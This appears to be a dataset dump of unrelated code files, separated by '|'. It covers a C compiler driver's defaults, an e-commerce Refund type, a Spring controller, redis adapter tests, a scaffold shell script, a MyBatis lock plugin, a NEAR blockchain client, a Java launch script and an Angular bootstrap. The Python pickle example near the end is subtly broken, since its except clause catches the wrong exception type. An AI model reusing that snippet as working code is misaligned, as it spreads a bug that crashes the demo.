static ToolEntryPoints const entries = {
cc_finalise,
cc,
toolenv_new,
toolenv_dispose,
MergeEnv,
toolenv_mark,
toolenv_getdelta,
toolenv_putinstallationdelta,
CC_EditEnv,
NULL
};
const ToolEntryPoints *armccinit(void) {
cc_default_env = NULL;
return &entries;
}
typedef struct {
char const *name;
char const *val;
} EnvItem;
#ifdef TARGET_DEFAULT_BIGENDIAN
# if TARGET_DEFAULT_BIGENDIAN
# define BYTESEX_DEFAULT_STR "=-bi"
# else
# define BYTESEX_DEFAULT_STR "=-li"
# endif
#else
# define BYTESEX_DEFAULT_STR "=-li"
#endif
#define str(s) #s
#define xstr(s) str(s)
static EnvItem const builtin_defaults[] = {
{".bytesex", BYTESEX_DEFAULT_STR},
#if defined(CPLUSPLUS)
{".lang", "=-cpp"},
#elif defined(TARGET_IS_UNIX)
{".lang", "=-fc"},
#else
{".lang", "=-ansi"},
#endif
#if (D_SUPPRESSED & D_IMPLICITCAST)
{".Ec", "=-Ec"},
#else
{".Ec", "=-E+c"},
#endif
#if (D_SUPPRESSED & D_PPALLOWJUNK)
{".Ep", "=-Ep"},
#else
{".Ep", "=-E+p"},
#endif
#if (D_SUPPRESSED & D_ZEROARRAY)
{".Ez", "=-Ez"},
#else
{".Ez", "=-E+z"},
#endif
#if (D_SUPPRESSED & D_CAST)
{".Ef", "=-Ef"},
#else
{".Ef", "=-E+f"},
#endif
#if (D_SUPPRESSED & D_LINKAGE)
{".El", "=-El"},
#else
{".El", "=-E+l"},
#endif
#ifdef TARGET_WANTS_FUNCTION_NAMES
{".ff", "=-f+f"},
#else
{".ff", "=-ff"},
#endif
{".fa", "=-f+a"},
{".fv", "=-f+v"},
#if (D_SUPPRESSED & D_ASSIGNTEST)
{".Wa", "=-Wa"},
#else
{".Wa", "=-W+a"},
#endif
#if (D_SUPPRESSED & D_DEPRECATED)
{".Wd", "=-Wd"},
#else
{".Wd", "=-W+d"},
#endif
#if (D_SUPPRESSED & D_IMPLICITFNS)
{".Wf", "=-Wf"},
#else
{".Wf", "=-W+f"},
#endif
#if (D_SUPPRESSED & D_GUARDEDINCLUDE)
{".Wg", "=-Wg"},
#else
{".Wg", "=-W+g"},
#endif
#if (D_SUPPRESSED & D_LOWERINWIDER)
{".Wl", "=-Wl"},
#else
{".Wl", "=-W+l"},
#endif
#if (D_SUPPRESSED & D_IMPLICITNARROWING)
{".Wn", "=-Wn"},
#else
{".Wn", "=-W+n"},
#endif
#if (D_SUPPRESSED & D_MULTICHAR)
{".Wm", "=-Wm"},
#else
{".Wm", "=-W+m"},
#endif
#if (D_SUPPRESSED & D_LONGLONGCONST)
{".Wo", "=-Wo"},
#else
{".Wo", "=-W+o"},
#endif
#if (D_SUPPRESSED & D_PPNOSYSINCLUDECHECK)
{".Wp", "=-Wp"},
#else
{".Wp", "=-W+p"},
#endif
#if (D_SUPPRESSED & D_STRUCTPADDING)
{".Ws", "=-Ws"},
#else
{".Ws", "=-W+s"},
#endif
#if (D_SUPPRESSED & D_FUTURE)
{".Wu", "=-Wu"},
#else
{".Wu", "=-W+u"},
#endif
#if (D_SUPPRESSED & D_IMPLICITVOID)
{".Wv", "=-Wv"},
#else
{".Wv", "=-W+v"},
#endif
#if (D_SUPPRESSED & D_STRUCTASSIGN)
{".Wz", "=-Wz"},
#else
{".Wz", "=-W+z"},
#endif
#ifdef CPLUSPLUS
# if (D_SUPPRESSED & D_CFRONTCALLER)
{".Wc", "=-Wc"},
# else
{".Wc", "=-W+c"},
# endif
# if (D_SUPPRESSED & D_IMPLICITCTOR)
{".Wi", "=-Wi"},
# else
{".Wi", "=-W+i"},
# endif
# if (D_SUPPRESSED & D_IMPLICITVIRTUAL)
{".Wr", "=-Wr"},
# else
{".Wr", "=-W+r"},
# endif
# if (D_SUPPRESSED & D_UNUSEDTHIS)
{".Wt", "=-Wt"},
# else
{".Wt", "=-W+t"},
# endif
#endif
{".-Isearch","=-f+k"},
{"-O", "=mix"},
#if defined(TARGET_IS_UNIX) || defined(TARGET_HAS_SEPARATE_CODE_DATA_SEGS)
{".rolits", "=-fw"},
#else
{".rolits", "=-f+w"},
#endif
{".enums", "=-f+y"},
{".schar", "=-z+c"},
{".swilr", "=-f+z"},
{"-gx", "?"},
{"-gt", "=+p"},
{"-g", "=-"},
{".nowarn", "?"},
#ifdef PASCAL
{".rd", "=-rd"},
#endif
#ifdef DEFAULT_DOES_NO_CSE
{"-zpz", "=0"},
#else
{"-zpz", "=1"},
#endif
{"-D__CC_NORCROFT", "==1"},
/*
* Predefine some symbols that give basic information about the size
* of objects. These are made to exist because ANSI rules mean that
* one can not go
* #if sizeof(xxx) == nnn
* as a pre-processing directive.
*/
{"-D__sizeof_int", "==" xstr(sizeof_int)},
{"-D__sizeof_long", "==" xstr(sizeof_long)},
{"-D__sizeof_ptr", "==" xstr(sizeof_ptr)},
{ "-zat", "=" xstr(alignof_toplevel_static_default) },
{NULL, NULL}
};
int toolenv_insertdefaults(ToolEnv *t) {
EnvItem const *p = builtin_defaults;
char v[8];
char const *s = TOOLVER_ARMCC;
int i;
int rc;
v[0] = v[1] = '=';
for (i = 2; isdigit(s[0]) || s[0] == '.'; i++, s++) v[i] = s[0];
v[i] = 0;
tooledit_insert(t, "-D__ARMCC_VERSION", v);
for (; p->name != NULL; p++) {
ToolEdit_InsertStatus rc = tooledit_insert(t, p->name, p->val);
if (rc == TE_Failed) return 1;
}
{ int argc = 0;
char **argp;
for (argp = driver_options; *argp != NULL; ++argp) argc++;
read_options(0, argc, driver_options, t, NO);
}
{ static char const * const predefs[] = TARGET_PREDEFINES;
Uint i;
for (i=0; i < sizeof(predefs)/sizeof(predefs[0]); i++)
/* note that the arg may be of the form "name" or "name=toks" */
/* the "name" form is equivalent to "name=1". */
AddDefine(t, predefs[i]);
}
if (setupenv.initial_flags & KEY_PCC)
tooledit_insert(t, ".lang", "-pcc");
#ifdef TARGET_SUPPORTS_TOOLENVS
rc = mcdep_toolenv_insertdefaults(t);
#endif
TE_NormaliseEtc(t);
if (cc_default_env == NULL) {
cc_default_env = toolenv_copy(t);
}
return rc;
}
/* End of driver.c */
|
import { Order } from "./order";
export declare enum RefundReason {
DISCOUNT = "discount",
RETURN = "return",
SWAP = "swap",
CLAIM = "claim",
OTHER = "other"
}
export declare class Refund {
id: string;
order_id: string;
order: Order;
amount: number;
note: string;
reason: string;
created_at: Date;
updated_at: Date;
metadata: any;
idempotency_key: string;
private beforeInsert;
}
/**
* @schema refund
* title: "Refund"
* description: "Refund represent an amount of money transfered back to the Customer for a given reason. Refunds may occur in relation to Returns, Swaps and Claims, but can also be initiated by a store operator."
* x-resourceId: refund
* properties:
* id:
* description: "The id of the Refund. This value will be prefixed with `ref_`."
* type: string
* order_id:
* description: "The id of the Order that the Refund is related to."
* type: string
* amount:
* description: "The amount that has be refunded to the Customer."
* type: integer
* note:
* description: "An optional note explaining why the amount was refunded."
* type: string
* reason:
* description: "The reason given for the Refund, will automatically be set when processed as part of a Swap, Claim or Return."
* type: string
* enum:
* - discount
* - return
* - swap
* - claim
* - other
* created_at:
* description: "The date with timezone at which the resource was created."
* type: string
* format: date-time
* updated_at:
* description: "The date with timezone at which the resource was last updated."
* type: string
* format: date-time
* metadata:
* description: "An optional key-value map with additional information."
* type: object
*/
|
package com.controller;
import com.entity.User;
import com.service.UserService;
import org.aspectj.weaver.ast.Var;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Controller;
import org.springframework.ui.Model;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestParam;
import java.util.List;
import java.util.Map;
@Controller
@RequestMapping("/manage/user")
public class UserController {
@Autowired
private UserService userService;
@RequestMapping(value = {"", "/", "/index"})
public String index(
@RequestParam Map<String, Object>map,
Model model)
{
List<User> lists = userService.getlist(map);
model.addAttribute("users", lists);
return "master/user";
}
}
|
my_2d_array = [[1,2,3],[4,5,6],[7,8,9]]
row_to_retrieve = 2
column_to_retrieve = 0
retrieved_element = my_2d_array[row_to_retrieve][column_to_retrieve] |
/**
* Test dependencies
*/
var assert = require('assert'),
Adapter = require('../../'),
Support = require('../support')(Adapter);
/**
* Raw waterline-redis `.find()` tests
*/
describe('adapter `.find()`', function() {
before(function(done) {
var definition = {
id: {
type: 'integer',
primaryKey: true,
autoIncrement: true
},
name: {
type: 'string'
},
age: {
type: 'integer'
}
};
Support.Setup('finders', 'finders', definition, function(err) {
Adapter.create('finders', 'finders', { name: '<NAME>', age: 19 }, function(err) {
if(err) throw err;
Adapter.create('finders', 'finders', { name: 'Annyong', age: 18 }, done);
});
});
});
after(function(done) {
Support.Teardown('finders', 'finders', done);
});
describe('simple', function() {
it("should find using string `name`", function(done) {
var criteria = { where: { name: '<NAME>' } };
Adapter.find('finders', 'finders', criteria, function(err, records) {
if(err) throw err;
assert(records);
assert(records.length === 1);
assert(records[0].name === '<NAME>');
done();
});
});
it("should find using integer `age`", function(done) {
var criteria = { where: { age: 18 } };
Adapter.find('finders', 'finders', criteria, function(err, records) {
if(err) throw err;
assert(records);
assert(records.length === 1);
assert(records[0].age === 18);
done();
});
});
it("should return all records with empty criteria", function(done) {
Adapter.find('finders', 'finders', {}, function(err, records) {
if(err) throw err;
assert(records);
assert(records.length === 2);
done();
});
});
});
describe("complex", function() {
it("should properly return records using `startsWith`", function(done) {
var criteria = { where: { name: { startsWith: 'Anny' } } };
Adapter.find('finders', 'finders', criteria, function(err, records) {
if(err) throw err;
assert(records);
assert(records.length === 1);
assert(records[0].name === 'Annyong');
done();
});
});
it("should properly return records using `endsWith`", function(done) {
var criteria = { where: { name: { endsWith: 'Holt' } } };
Adapter.find('finders', 'finders', criteria, function(err, records) {
if(err) throw err;
assert(records);
assert(records.length === 1);
assert(records[0].name === '<NAME>');
done();
});
});
it("should properly return records using `like`", function(done) {
var criteria = { where: { like: { name: '%eve%' } } };
Adapter.find('finders', 'finders', criteria, function(err, records) {
if(err) throw err;
assert(records);
assert(records.length === 1);
assert(records[0].name === '<NAME>');
done();
});
});
it("should properly return records using `contains`", function(done) {
var criteria = { where: { name: { contains: 'nny' } } };
Adapter.find('finders', 'finders', criteria, function(err, records) {
if(err) throw err;
assert(records);
assert(records.length === 1);
assert(records[0].name === 'Annyong');
done();
});
});
it("should properly return records using `in` type query", function(done) {
var criteria = { where: { name: ['<NAME>', 'Annyong'] } };
Adapter.find('finders', 'finders', criteria, function(err, records) {
if(err) throw err;
assert(records);
assert(records.length === 2);
assert(records[0].name === '<NAME>');
assert(records[1].name === 'Annyong');
done();
});
});
it("should properly return records using `lessThan`", function(done) {
var criteria = { where: { age: { lessThan: 19 } } };
Adapter.find('finders', 'finders', criteria, function(err, records) {
if(err) throw err;
assert(records);
assert(records.length === 1);
assert(records[0].name === 'Annyong');
done();
});
});
it("should properly return records using `lessThanOrEqual`", function(done) {
var criteria = { where: { age: { lessThanOrEqual: 19 } } };
Adapter.find('finders', 'finders', criteria, function(err, records) {
if(err) throw err;
assert(records);
assert(records.length === 2);
assert(records[0].name === '<NAME>');
assert(records[1].name === 'Annyong');
done();
});
});
it("should properly return records using `greaterThan`", function(done) {
var criteria = { where: { age: { greaterThan: 18 } } };
Adapter.find('finders', 'finders', criteria, function(err, records) {
if(err) throw err;
assert(records);
assert(records.length === 1);
assert(records[0].name === '<NAME>');
done();
});
});
it("should properly return records using `greaterThanOrEqual`", function(done) {
var criteria = { where: { age: { greaterThanOrEqual: 18 } } };
Adapter.find('finders', 'finders', criteria, function(err, records) {
if(err) throw err;
assert(records);
assert(records.length === 2);
assert(records[0].name === '<NAME>');
assert(records[1].name === 'Annyong');
done();
});
});
});
describe('additional functionality', function() {
// Returns error, rather than dying.
it("should gracefully fail on invalid criteria.", function(done) {
var criteria = {
where: {
name: {
startsWith: 'Steve',
captain : 'Stop making a mess'
}
}
};
Adapter.find('finders', 'finders', criteria, function(err, records) {
assert(err.toString() === 'Error: Invalid query syntax!');
assert(!records);
done();
});
});
it("should properly return records using `limit`", function(done) {
var criteria = { where: { age: [18, 19] }, limit: 1 };
Adapter.find('finders', 'finders', criteria, function(err, records) {
if(err) throw err;
assert(records);
assert(records.length === 1);
assert(records[0].name === '<NAME>');
done();
});
});
});
});
|
#!/bin/bash
echo ""
echo "Applying migration $className;format="snake"$"
echo "Adding routes to conf/app.routes"
echo "" >> ../conf/app.routes
echo "GET /:srn/new-return/$className;format="decap"$ controllers.$className$Controller.onPageLoad(mode: Mode = NormalMode, srn: String)" >> ../conf/app.routes
echo "POST /:srn/new-return/$className;format="decap"$ controllers.$className$Controller.onSubmit(mode: Mode = NormalMode, srn: String)" >> ../conf/app.routes
echo "GET /:srn/new-return/change$className$ controllers.$className$Controller.onPageLoad(mode: Mode = CheckMode, srn: String)" >> ../conf/app.routes
echo "POST /:srn/new-return/change$className$ controllers.$className$Controller.onSubmit(mode: Mode = CheckMode, srn: String)" >> ../conf/app.routes
echo "Adding messages to conf.messages"
echo "" >> ../conf/messages.en
echo "$className;format="decap"$.title = $className;format="decap"$" >> ../conf/messages.en
echo "$className;format="decap"$.heading = $className;format="decap"$" >> ../conf/messages.en
echo "$className;format="decap"$.checkYourAnswersLabel = $className;format="decap"$" >> ../conf/messages.en
echo "$className;format="decap"$.error.required = Enter $className;format="decap"$" >> ../conf/messages.en
echo "$className;format="decap"$.error.length = $className$ must be $maxLength$ characters or less" >> ../conf/messages.en
echo "Adding to UserAnswersEntryGenerators"
awk '/trait UserAnswersEntryGenerators/ {\
print;\
print "";\
print " implicit lazy val arbitrary$className$UserAnswersEntry: Arbitrary[($className$Page.type, JsValue)] =";\
print " Arbitrary {";\
print " for {";\
print " page <- arbitrary[$className$Page.type]";\
print " value <- arbitrary[String].suchThat(_.nonEmpty).map(Json.toJson(_))";\
print " } yield (page, value)";\
print " }";\
next }1' ../test/generators/UserAnswersEntryGenerators.scala > tmp && mv tmp ../test/generators/UserAnswersEntryGenerators.scala
echo "Adding to PageGenerators"
awk '/trait PageGenerators/ {\
print;\
print "";\
print " implicit lazy val arbitrary$className$Page: Arbitrary[$className$Page.type] =";\
print " Arbitrary($className$Page)";\
next }1' ../test/generators/PageGenerators.scala > tmp && mv tmp ../test/generators/PageGenerators.scala
echo "Adding to UserAnswersGenerator"
awk '/val generators/ {\
print;\
print " arbitrary[($className$Page.type, JsValue)] ::";\
next }1' ../test/generators/UserAnswersGenerator.scala > tmp && mv tmp ../test/generators/UserAnswersGenerator.scala
echo "Adding helper method to CheckYourAnswersHelper"
awk '/class CheckYourAnswersHelper/ {\
print;\
print "";\
print " def $className;format="decap"$: Option[Row] = userAnswers.get($className$Page) map {";\
print " answer =>";\
print " Row(";\
print " key = Key(msg\"$className;format="decap"$.checkYourAnswersLabel\", classes = Seq(\"govuk-!-width-one-half\")),";\
print " value = Value(lit\"\$answer\"),";\
print " actions = List(";\
print " Action(";\
print " content = msg\"site.edit\",";\
print " href = controllers.routes.$className$Controller.onPageLoad(CheckMode, srn).url,";\
print " visuallyHiddenText = Some(msg\"site.edit.hidden\".withArgs(msg\"$className;format="decap"$.checkYourAnswersLabel\"))";\
print " )";\
print " )";\
print " )";\
print " }";\
next }1' ../app/utils/CYAHelper.scala > tmp && mv tmp ../app/utils/CYAHelper.scala
echo "Migration $className;format="snake"$ completed"
|
class NumberManipulator:
def manipulate_number(self, num):
sequence = [num]
while num != 1:
if num % 2 == 0:
num = num // 2
else:
num = num * 3 + 1
sequence.append(num)
return sequence |
/**
* Copyright 2015-2016 the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.shenjia.mybatis.generator.plugins;
import java.util.List;
import java.util.Optional;
import org.mybatis.generator.api.IntrospectedColumn;
import org.mybatis.generator.api.IntrospectedTable;
import org.mybatis.generator.api.PluginAdapter;
import org.mybatis.generator.api.dom.xml.Attribute;
import org.mybatis.generator.api.dom.xml.TextElement;
import org.mybatis.generator.api.dom.xml.VisitableElement;
import org.mybatis.generator.api.dom.xml.XmlElement;
import org.mybatis.generator.internal.util.StringUtility;
/**
*
* @author json
*
*/
public class OptimisticLockPlugin extends PluginAdapter {
private String lockColumnName = "version";
public boolean validate(List<String> warnings) {
if (StringUtility.stringHasValue(properties.getProperty("lockColumnName"))) {
this.lockColumnName = properties.getProperty("lockColumnName");
}
return true;
}
@Override
public boolean sqlMapUpdateByExampleWithoutBLOBsElementGenerated(XmlElement element,
IntrospectedTable introspectedTable) {
return sqlMapUpdateByExampleWithBLOBsElementGenerated(element, introspectedTable);
}
@Override
public boolean sqlMapUpdateByExampleWithBLOBsElementGenerated(XmlElement element,
IntrospectedTable introspectedTable) {
Optional<IntrospectedColumn> ic = introspectedTable.getColumn(lockColumnName);
if (!ic.isPresent()) {
String tableName = introspectedTable.getAliasedFullyQualifiedTableNameAtRuntime();
System.err.println("[" + tableName + "] lock column not exists");
return true;
}
String jp = ic.get().getJavaProperty();
List<VisitableElement> elements = element.getElements();
for (int i = 0; i < elements.size(); i++) {
String content = ((TextElement) elements.get(i)).getContent();
if (content.indexOf(lockColumnName) > 0) {
elements.set(i, new TextElement(content.replaceAll(jp, jp + " + 1")));
break;
}
}
return true;
}
@Override
public boolean sqlMapUpdateByExampleSelectiveElementGenerated(XmlElement element,
IntrospectedTable introspectedTable) {
try {
Optional<IntrospectedColumn> ic = introspectedTable.getColumn(lockColumnName);
if (!ic.isPresent()) {
String tableName = introspectedTable.getAliasedFullyQualifiedTableNameAtRuntime();
System.err.println("[" + tableName + "] lock column not exists");
return true;
}
List<VisitableElement> elements = element.getElements();
for (int i = 0; i < elements.size(); i++) {
VisitableElement oldNode = elements.get(i);
if (updateSetNode(oldNode, ic.get())) {
break;
}
}
} catch (Exception e1) {
e1.printStackTrace();
}
return true;
}
@Override
public boolean sqlMapUpdateByPrimaryKeyWithoutBLOBsElementGenerated(XmlElement element,
IntrospectedTable introspectedTable) {
return sqlMapUpdateByPrimaryKeyWithBLOBsElementGenerated(element, introspectedTable);
}
@Override
public boolean sqlMapUpdateByPrimaryKeyWithBLOBsElementGenerated(XmlElement element,
IntrospectedTable introspectedTable) {
Optional<IntrospectedColumn> ic = introspectedTable.getColumn(lockColumnName);
if (!ic.isPresent()) {
String tableName = introspectedTable.getAliasedFullyQualifiedTableNameAtRuntime();
System.err.println("[" + tableName + "] lock column not exists");
return true;
}
String jp = ic.get().getJavaProperty();
List<VisitableElement> elements = element.getElements();
for (int i = 0; i < elements.size(); i++) {
String content = ((TextElement) elements.get(i)).getContent();
if (content.indexOf(lockColumnName) > 0) {
elements.set(i, new TextElement(content.replaceAll(jp, jp + " + 1")));
continue;
}
if (content.indexOf("where") >= 0) {
elements.set(i, buildWhereElement(content, jp, ic.get().getJdbcTypeName()));
break;
}
}
return true;
}
@Override
public boolean sqlMapUpdateByPrimaryKeySelectiveElementGenerated(XmlElement element,
IntrospectedTable introspectedTable) {
try {
Optional<IntrospectedColumn> ic = introspectedTable.getColumn(lockColumnName);
if (!ic.isPresent()) {
String tableName = introspectedTable.getAliasedFullyQualifiedTableNameAtRuntime();
System.err.println("[" + tableName + "] lock column not exists");
return true;
}
List<VisitableElement> elements = element.getElements();
for (int i = 0; i < elements.size(); i++) {
VisitableElement oldNode = elements.get(i);
updateSetNode(oldNode, ic.get());
VisitableElement newNode = updateWhereNode(oldNode, ic.get());
if (null != newNode) {
elements.set(i, newNode);
break;
}
}
} catch (Exception e1) {
e1.printStackTrace();
}
return true;
}
private boolean updateSetNode(VisitableElement element, IntrospectedColumn ic) {
if (!(element instanceof XmlElement)) {
return false;
}
XmlElement xe = (XmlElement) element;
if (!"set".equals(xe.getName())) {
return false;
}
for (VisitableElement e : xe.getElements()) {
if (!(e instanceof XmlElement)) {
continue;
}
XmlElement setNode = (XmlElement) e;
for (Attribute a : setNode.getAttributes()) {
if (!"test".equals(a.getName())) {
continue;
}
String jp = ic.getJavaProperty();
if (a.getValue().indexOf(jp) < 0) {
continue;
}
List<VisitableElement> elements = setNode.getElements();
String content = ((TextElement) elements.get(0)).getContent();
elements.set(0, new TextElement(content.replaceAll(jp, jp + " + 1")));
return true;
}
}
return false;
}
private VisitableElement updateWhereNode(VisitableElement element, IntrospectedColumn ic) {
if (!(element instanceof TextElement)) {
return null;
}
String content = ((TextElement) element).getContent();
if (content.indexOf("where ") < 0) {
return null;
}
return buildWhereElement(content, ic.getJavaProperty(), ic.getJdbcTypeName());
}
private TextElement buildWhereElement(String content, String javaProperty, String javaTypeName) {
int idx = content.indexOf("where") + 6;
StringBuilder buf = new StringBuilder(200);
buf.append(content.substring(0, idx)).append(lockColumnName).append(" = #{").append(javaProperty)
.append(",jdbcType=").append(javaTypeName).append("} and ").append(content.substring(idx));
return new TextElement(buf.toString());
}
}
|
module Near
class Client < Common::IndexerClient
# Get current service status
def status
Near::Status.new(get('/status'))
end
# Get current chain height
def current_height
get('/height')['height']
end
# Get the most recent block
def current_block
Near::Block.new(get('/block'))
rescue Common::IndexerClient::NotFoundError
nil
end
# Get block by hash or height
def block(id)
Near::Block.new(get("/blocks/#{id}"))
rescue Common::IndexerClient::NotFoundError
nil
end
alias block_by_hash block
alias block_by_height block
# Get block average times
def block_times(limit = 100)
Near::BlockTime.new(get('/block_times', limit: limit))
end
# Get block stats for a given time interval
def block_stats_charts(opts = {})
get_collection(Near::BlockStat, '/block_stats', opts)
end
def block_stats(period: '48', interval: 'h')
get_collection(Near::BlockStat, '/block_stats', limit: period, bucket: interval)
end
def paginate(resource_class, path, opts = {})
Near::PaginatedResponse.new(resource_class, get(path, opts))
end
def transaction(id)
Near::Transaction.new(get("/transactions/#{id}"))
end
# Get validators
def validators
get_collection(Near::Validator, '/validators')
end
# Get validator by hash or height
def validator(id)
data = get("/validators/#{id}")
data['validator'].merge!(
'account': data['account'],
'epochs': data['epochs'],
'blocks': data['blocks']
)
Near::Validator.new(data['validator'])
end
alias validator_by_height validator
# Get account by name
def account(id)
Near::Account.new(get("/accounts/#{id}"))
end
def delegations(id)
get_collection(Near::Delegation, "/delegations/#{id}")
end
end
end
|
#!/bin/bash
java -Xms256m -Xmx512m -server -XX:+HeapDumpOnOutOfMemoryError -XX:HeapDumpPath=logs -Dlogging.config=config/log4j2.xml -Dspring.config.location=config/application.yml -Dfile.encoding=UTF-8 -Xloggc:logs/gc.log -verbose:gc -XX:+PrintGCDetails -XX:+PrintGCDateStamps -jar elasticsearch-export.jar "$@" |
import pickle
class NonPicklableObject:
def __reduce__(self):
raise NotImplementedError("I am not picklable, fool!")
class SerializableModel:
def __reduce__(self):
if isinstance(self, NonPicklableObject):
raise NonPicklableError("This object is not picklable")
return (self.__class__, ())
class MockModelSkeleton(SerializableModel):
def __init__(self):
super(MockModelSkeleton, self).__init__()
# Custom exception for non-picklable objects
class NonPicklableError(Exception):
pass
# Pickling a picklable object
picklable_obj = MockModelSkeleton()
pickled_data = pickle.dumps(picklable_obj)
print("Pickled data for picklable object:", pickled_data)
# Attempting to pickle a non-picklable object
non_picklable_obj = NonPicklableObject()
try:
pickle.dumps(non_picklable_obj)
except NonPicklableError as e:
print("Exception raised when pickling non-picklable object:", e) |
<filename>testapp/hybrid/app/main.ts
import * as angular from 'angular2/src/upgrade/angular_js';
import {myApp} from './myApp'
import {ng2} from './ng2'
import {ng1} from './ng1'
import {adapter} from './upgrader';
var ng1module = angular.module('hybridApp', []);
ng1module.directive('myApp', myApp);
ng1module.directive('ng2', ng2);
ng1module.directive('ng1', ng1);
adapter.bootstrap(document.body, ['hybridApp']);
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.